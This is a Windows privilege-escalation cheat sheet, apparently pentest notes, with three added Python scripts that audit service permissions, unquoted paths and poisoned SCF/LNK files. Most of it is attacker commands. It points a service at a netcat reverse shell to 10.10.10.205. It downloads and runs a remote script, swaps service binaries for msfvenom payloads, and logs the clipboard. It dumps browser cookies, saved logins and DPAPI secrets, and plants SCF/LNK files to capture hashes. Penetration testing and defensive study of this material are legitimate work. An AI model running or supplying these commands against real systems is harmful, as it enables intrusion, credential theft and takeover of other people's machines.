Windows
Enumeration
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Get-Content .\PrivescCheck.ps1 | Out-String | IEX
Functionality
LOLBAS catalogues known Windows binaries and scripts that can be abused to perform privileged actions.
Display the privileges of the current token, ideally from a privileged shell.
whoami /priv
Privileges that are present but disabled can be enabled with EnableAllTokenPrivs.ps1.
.\EnableAllTokenPrivs.ps1
Hyper-V Administrators
See HERE for full list.
User Account Control (UAC) is a feature that enables a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run in the security context of a non-administrator account unless an administrator explicitly authorizes them to run with administrator-level access to the system. UAC works with integrity levels ranging from low to high.
Check if UAC is enabled.
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Compile UACMe with Visual Studio to get akagi.exe.
Check the Windows version and note the build number.
[environment]::OSVersion.Version
Look up the method key for that build number in the UACMe GitHub repository.
akagi.exe [Key] [Param]
Misconfigurations & Weak Permissions
.\SharpUp.exe audit
PowerUP (PowerSploit or Empire)
powershell -ep bypass
. .\PowerUp.ps1
See HERE.
Modifiable Service Binaries (weak ACLs)
.\SharpUp.exe audit
# === Modifiable Service Binaries ===
Using icacls we can verify the vulnerability and see if we have full permissions to the directory.
icacls "<PathName>"
At this point we can replace the service binary with a malicious binary generated with msfvenom.
cmd /c copy /Y "<MaliciousExe>" "<PathName>"
Restart the service.
sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>
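As an added defensive check (not code from the original page), the following Python parses icacls output like the one above and lists the low-privileged principals whose allow ACEs grant a write-class right on the service binary's directory; the sample output and the path are constructed.

```python
import re

# Constructed sample shaped like the output of icacls "<PathName>" (not from a real host)
ICACLS_SAMPLE = r"""C:\Program Files\Vuln App\bin BUILTIN\Users:(OI)(CI)(F)
                              NT AUTHORITY\Authenticated Users:(OI)(CI)(RX)
                              Everyone:(DENY)(W)
                              NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                              BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that any local user effectively belongs to
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# Simple and specific icacls rights that allow replacing or altering the binary
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}

def writable_by_low_priv(output, path):
    """Return [(principal, [rights])] for low-privileged principals whose
    allow ACE on the queried path grants a write-class right."""
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):            # the first line carries the path
            line = line[len(path):].strip()
        if ":" not in line or line.startswith("Successfully"):
            continue
        who, _, flags = line.rpartition(":")
        tokens = {t for grp in re.findall(r"\(([^)]*)\)", flags)
                  for t in grp.split(",")}
        if "DENY" in tokens:                 # deny ACEs never grant access
            continue
        hit = tokens & WRITE_RIGHTS
        if who.lower() in LOW_PRIV and hit:
            findings.append((who, sorted(hit)))
    return findings

if __name__ == "__main__":
    target = r"C:\Program Files\Vuln App\bin"
    for who, rights in writable_by_low_priv(ICACLS_SAMPLE, target):
        print(f"{who} can modify the service directory: {rights}")
```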
Modifiable Services
.\SharpUp.exe audit
# === Modifiable Service ===
Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service.
accesschk.exe /accepteula -quvcw <NameService>
We can use our permissions to change the binary path maliciously.
sc.exe config <NameService> binPath= "cmd /c <COMMAND>"
Restart the service.
sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>
Unquoted Service Paths
If the path of a service binary contains one or more spaces and is not enclosed in quotes, Windows can interpret it in several ways: it parses the path from left to right, stopping at each space and appending .exe. So if we can place a binary in one of these intermediate locations and restart the service, our binary is executed instead.
Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable.
We can identify unquoted service binary paths using
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Or with PowerUP (PowerSploit or Empire)
. .\PowerUp.ps1
Get-UnquotedService
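Added example, not code from the page: this Python applies the left-to-right parsing rule described above to wmic service get name,pathname output and lists, for each unquoted service, the intermediate paths Windows would try before the real binary, which are the locations whose directory ACLs an auditor needs to check. The wmic output is constructed.

```python
import re

# Constructed sample in the shape of `wmic service get name,pathname` output
# (not captured from a real host).
WMIC_SAMPLE = """Name      PathName
VulnSvc   C:\\Program Files\\Vuln App\\bin\\service.exe -run
SafeSvc   "C:\\Program Files\\Safe App\\svc.exe" -run
WinSvc    C:\\Windows\\System32\\svchost.exe -k netsvcs
NoSpace   C:\\Tools\\agent.exe
"""

def hijack_candidates(pathname):
    """Paths Windows tries before the real binary when a service path is
    unquoted and contains spaces; [] when the path is not at risk."""
    cmd = pathname.strip()
    if cmd.startswith('"'):                  # quoted: parsed as one token
        return []
    m = re.match(r"(.*?\.exe)(?=\s|$)", cmd, re.IGNORECASE)
    if not m:
        return []
    binary = m.group(1)
    if binary.lower().startswith("c:\\windows\\"):
        return []                            # skipped, like the wmic filter above
    parts = binary.split(" ")
    # Left to right, stopping at each space and appending .exe; the last
    # token is the intended binary, so it is not a candidate.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def audit_wmic(output):
    """Map service name -> candidate paths for every unquoted service."""
    findings = {}
    for line in output.strip().splitlines()[1:]:   # skip the header row
        fields = re.split(r"\s{2,}", line.strip(), maxsplit=1)
        if len(fields) != 2:
            continue
        name, pathname = fields
        cands = hijack_candidates(pathname)
        if cands:
            findings[name] = cands
    return findings

if __name__ == "__main__":
    for svc, cands in audit_wmic(WMIC_SAMPLE).items():
        print(svc)
        for c in cands:
            print("  check ACL of", c.rsplit("\\", 1)[0], "->", c)
```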
Permissive Registry ACLs
It is also worth searching for weak service ACLs in the Windows Registry, with AccessChk from the Sysinternals suite.
accesschk.exe /accepteula "<USER>" -kvuqsw hklm\System\CurrentControlSet\services
# RW HKLM\System\CurrentControlSet\services\ModelManagerService
# KEY_ALL_ACCESS
We can abuse this using
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# start service
We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
File
Search for sensitive information in different files
dir /s *<STRING>*
unattend.xml
dir /s *unattend.xml*
dir /s *autounattend.xml*
Application Configuration Files
Look for readable configuration files in which passwords can be saved.
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
cd c:\Users\<USER>\Documents & findstr /SI /M "password" *.xml *.ini *.txt
select-string -Path C:\Users\<USER>\Documents\*.txt -Pattern password
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Dictionary Files
Users can add words to the browser's custom dictionary to avoid the distracting red underline, and these sometimes include passwords.
gc 'C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String <STRING>
PowerShell Credentials
Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
Example script
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword
If we have gained command execution in the context of this user, we can recover the cleartext credentials:
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password
StickyNotes
C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Copy them to your system and open them with DB Browser for SQLite, or with PSSQLite on the target
Import-Module .\PSSQLite.psd1
$db = 'C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
Password Managers
KeePass, 1Password, Thycotic, CyberArk, etc.
dir /s *.kdbx*
keepass2john <FILE.kdbx>
Crack with hashcat mode 13400.
VHDX & VMDK
dir /S /B *.vhd == *.vhdx == *.vmdk
Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue
From the mounted disk we can extract the SYSTEM, SAM and SECURITY hives.
guestmount --add <FILE>.vhdx --ro /mnt/vhdx/ [-m /dev/sda1]
SMB Shares
With netexec search for interesting files among the shares.
nxc smb <IP> -u <USER> -p <PASS> --spider '<SHARE>' --regex '<REGEX>'
nxc smb <IP> -u <USER> -p <PASS> -M spider_plus
(try again if there are errors)
Password
Search for passwords saved in the system.
LaZagne searches for saved passwords.
laZagne.exe all
Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials.
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target <MACHINE, e.g. WINLPE-SRV01>
Snaffler searches for passwords and interesting files.
.\snaffler.exe -s -o snaffler.log [-i]
.\snaffler.exe -s -d <domain> -o snaffler.log [-i]
Browser
Retrieve cookies and saved logins from Google Chrome.
.\SharpChrome.exe logins /unprotect
Retrieve Chromium data, such as cookies, history and saved logins.
PowerShell script which uses reflection to load SharpChromium.
Import-Module .\Invoke-SharpChromium.ps1
Invoke-SharpChromium -Command "cookies <SITE>"
If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.
Extract cookies from the Firefox cookies.SQLite database.
Copy and transfer the DB with cookies to the attacking machine.
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
Archived Passwords
cmdkey /list
# take note of user
Connect with RDP (GUI) or with runas.
runas /savecred /user:<DOMAIN>\<USER> "<COMMAND>"
Autorun
Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup.
The username and password are stored in the registry, in clear-text.
Autologon.exe from the Sysinternals suite instead encrypts the password as an LSA secret.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Putty
For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.
reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions"
# take note of sessions
reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<NAME_SESSION>"
If we had admin privileges, we would also be able to find it under the corresponding user's hive in HKEY_USERS.
DPAPI
The DPAPI (Data Protection API) is an internal component of Windows. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the user's directory and are secured by user-specific master keys derived from the user's password.
# MASTER KEY ENCRYPTED
ls -Hidden C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\
ls -Hidden C:\Users\<USER>\AppData\Local\Microsoft\Protect\
# PROTECTED FILE
ls -Hidden C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\
ls -Hidden C:\Users\<USER>\AppData\Local\Microsoft\Credentials\
Get-Content <FILE>

IMPORTANT: transfer the files from Windows without corrupting them (e.g. base64-encode them first).
Extract Master Key
dpapi masterkey -file <MASTERKEY> -sid "<SUID>" -password '<USER_PASS>'
Extract Protected Data with Master Key
dpapi credential -f <PROTECTED_FILE> -key <MASTERKEY>
Other tools: DonPAPI, dpapick, dpapilab and secretsdump.py.
Various
Variables
Check environment variables for sensitive information such as passwords or misconfiguration.
set
Get-ChildItem Env: | ft key,value
History
Administrators often clear the history only with Clear-History, but this is not enough, as it only clears what Get-History shows; the history can still be found in the PSReadLine file.
Get-History
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Scheduled Tasks
Get-ScheduledTask
schtasks /query /fo LIST /v
# Task To Run
Unfortunately, we cannot list scheduled tasks created by other users (such as admins), because they are stored in C:\Windows\System32\Tasks.
Check whether there are files that scheduled tasks run by an administrator may act on.
DLL Injection
LoadLibrary
Manual Mapping
Reflective DLL Injection
Vulnerable Service & Applications
Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check if they contain vulnerabilities.
Druva inSync 6.6.3
CVE-2020-5752 with Invoke-PowerShellTcp.ps1 (see Reverse Shell)
mRemoteNG is used to manage and connect to remote systems using VNC, RDP, SSH, and similar protocols.
%USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml
(take the password from the <NODE> element)
Use mRemoteNG-Decrypt
mremoteng_decrypt.py -s "<PASSWORD>"
mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass>
(try brute-forcing the MasterPass with a wordlist and a foreach loop)
Always Install Elevated
You can append /v AlwaysInstallElevated to query only that value.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
Create an msi payload with msfvenom and run it on the target.
msiexec /i myExploit.msi /quiet /qn /norestart
Or use Write-UserAddMSI in PowerUp (PowerSploit or Empire).
Import-Module .\PowerUp.ps1
Write-UserAddMSI
.\UserAdd.msi
Citrix Breakout
It is possible to utilize windows dialog boxes (with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.
Enter the path in the File Name field, with All Files selected as the file type.
\\127.0.0.1\c$\<PATH>
With smbserver on the attacker
\\<MY_IP>\share
Because of the restrictions within File Explorer, copying files directly is not possible.
An alternative is right-clicking the file > Run, where the executable opens a terminal, as in the following:
#include <stdlib.h>
int main() {
    system("C:\\Windows\\System32\\cmd.exe");
}
See resources1, resources2
Email
Searching through email in a Microsoft Exchange environment for specific terms.
Clipboard
Stealing the clipboard
Import-Module .\Invoke-Clipboard.ps1
Invoke-ClipboardLogger
Backup Program
The password used for the backup is stored in $env:RESTIC_PASSWORD; if it is not set, it is requested each time.
restic.exe -r E:\restic init
(init backup directory)
restic.exe -r E:\restic\ backup C:\FolderToBackup
--use-fs-snapshot creates a Volume Shadow Copy so that files in active use can be backed up.
restic.exe -r E:\restic\ snapshots
restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere
Interacting with Users
Passive Traffic
Monitoring for Process Command Lines
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
IEX (iwr 'http://<MY_IP>:<MY_PORT>/procmon.ps1')
SCF
If there are public folders that are also accessed by other users and that we have write permissions to, we can place an .scf file there, which is processed every time the folder containing it is opened.
Using SCFs no longer works on Server 2019 hosts.
[Shell]
Command=2
IconFile=\\<MY_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I <INTERFACE>
LNK
We can get the same effect as with SCF using a malicious .lnk file.
We can use various tools to generate a malicious .lnk file, such as Lnkbomb, or we can run this code.
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\<PATH>\<NAME>.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
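Added example (not part of the page): a Python scanner for writable shares that flags the two artifacts described above, .scf files whose IconFile is a UNC path and .lnk files containing a UNC target. The sample files and the host 10.0.0.5 are constructed, and the LNK check is a string heuristic rather than a full LNK parser.

```python
import configparser
import re

# Constructed sample files as they might sit on a writable share; the host
# 10.0.0.5 and the contents are made up for this example.
SAMPLE_FILES = {
    "thumbs.scf": (b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.5\\share\\legit.ico\r\n"
                   b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    "local.scf": b"[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n",
    "report.lnk": b"L\x00\x00\x00" + "\\\\10.0.0.5\\@pwn.png".encode("utf-16-le"),
    "notes.txt": b"nothing of interest",
}

UNC_RE = re.compile(r"\\\\[^\\\s]+\\")     # matches a leading \\host\ prefix

def scf_icon_target(data):
    """Return the IconFile value of an .scf file, or None if absent or unparsable."""
    text = data.decode("utf-8", errors="replace").replace("\r\n", "\n")
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp.get("Shell", "IconFile", fallback=None)

def lnk_has_unc(data):
    """Heuristic: LNK string data is UTF-16LE, so decode at both byte offsets
    and look for a UNC host prefix (this is not a full LNK parser)."""
    for off in (0, 1):
        text = data[off:].decode("utf-16-le", errors="ignore")
        if UNC_RE.search(text):
            return True
    return False

def find_poisoned_files(files):
    """Return [(name, reason)] for files that make Explorer contact a remote
    host as soon as the folder is opened."""
    hits = []
    for name, data in files.items():
        low = name.lower()
        if low.endswith(".scf"):
            icon = scf_icon_target(data)
            if icon and UNC_RE.match(icon.strip()):
                hits.append((name, "SCF IconFile is a UNC path: " + icon.strip()))
        elif low.endswith(".lnk") and lnk_has_unc(data):
            hits.append((name, "LNK contains a UNC path"))
    return hits

if __name__ == "__main__":
    for name, reason in find_poisoned_files(SAMPLE_FILES):
        print(f"{name}: {reason}")
```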
Kernel
Kernel-level exploits depend on the kernel version and operating system, and may cause crashes!
Examine the installed updates and search the KB (Microsoft Knowledge Base ID number) in the Update Catalog.
systeminfo
wmic qfe list brief
Get-Hotfix
PowerShell script to quickly find missing software patches.
Import-Module .\Sherlock.ps1
Find-AllVulns
Windows Exploit Suggester is a Python script that enumerates missing KBs (potentially missing patches) and suggests exploits.
python2.7 windows-exploit-suggester.py --update
Save the systeminfo output from the target Windows system.
python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>
See Windows-CVE section.